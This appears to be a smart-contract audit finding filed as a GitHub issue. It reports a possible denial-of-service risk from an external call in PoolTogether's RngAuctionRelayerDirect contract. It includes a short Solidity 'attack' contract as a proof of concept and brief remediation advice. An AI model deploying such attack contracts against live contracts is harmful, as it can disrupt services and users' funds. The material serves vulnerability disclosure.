Detailed description of the impact of this finding.
External calls can fail accidentally or deliberately, which can cause a DoS condition in the contract. To minimize the damage caused by such failures, it is better to isolate each external call into its own transaction that can be initiated by the recipient of the call. This is especially relevant for payments, where it is better to let users withdraw funds rather than push funds to them automatically (this also reduces the chance of problems with the gas limit).
Provide direct links to all referenced code in GitHub.
https://github.com/GenerationSoftware/pt-v5-draw-auction/blob/f1c6d14a1772d6609de1870f8713fb79977d51c1/src/RngAuctionRelayerDirect.sol#L39
(bool success, bytes memory returnData) = address(_rngAuctionRelayListener).call(data);
Add screenshots, logs, or any other relevant proof that illustrates the concept.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
import "/2023-08-pooltogether/pt-v5-draw-auction/src/RngAuctionRelayerDirect.sol";
import "/2023-08-pooltogether/pt-v5-draw-auction/src/interfaces/IRngAuctionRelayListener.sol";
contract AttackRngAuctionRelayerDirect {
RngAuctionRelayerDirect public rngAuctionRelayListener;
constructor(RngAuctionRelayerDirect _rngAuctionRelayListener) public payable {
rngAuctionRelayListener = RngAuctionRelayerDirect(_rngAuctionRelayListener);
}
function attack(RngAuctionRelayerDirect _rngAuctionRelayListener) public payable {
rngAuctionRelayListener.relay(IRngAuctionRelayListener(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4), msg.sender);
}
}
NB: Victim address in this test case is 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4
Test Case
VS Code
Do not use call function.
use require function on call.
DoS
The text was updated successfully, but these errors were encountered:
All reactions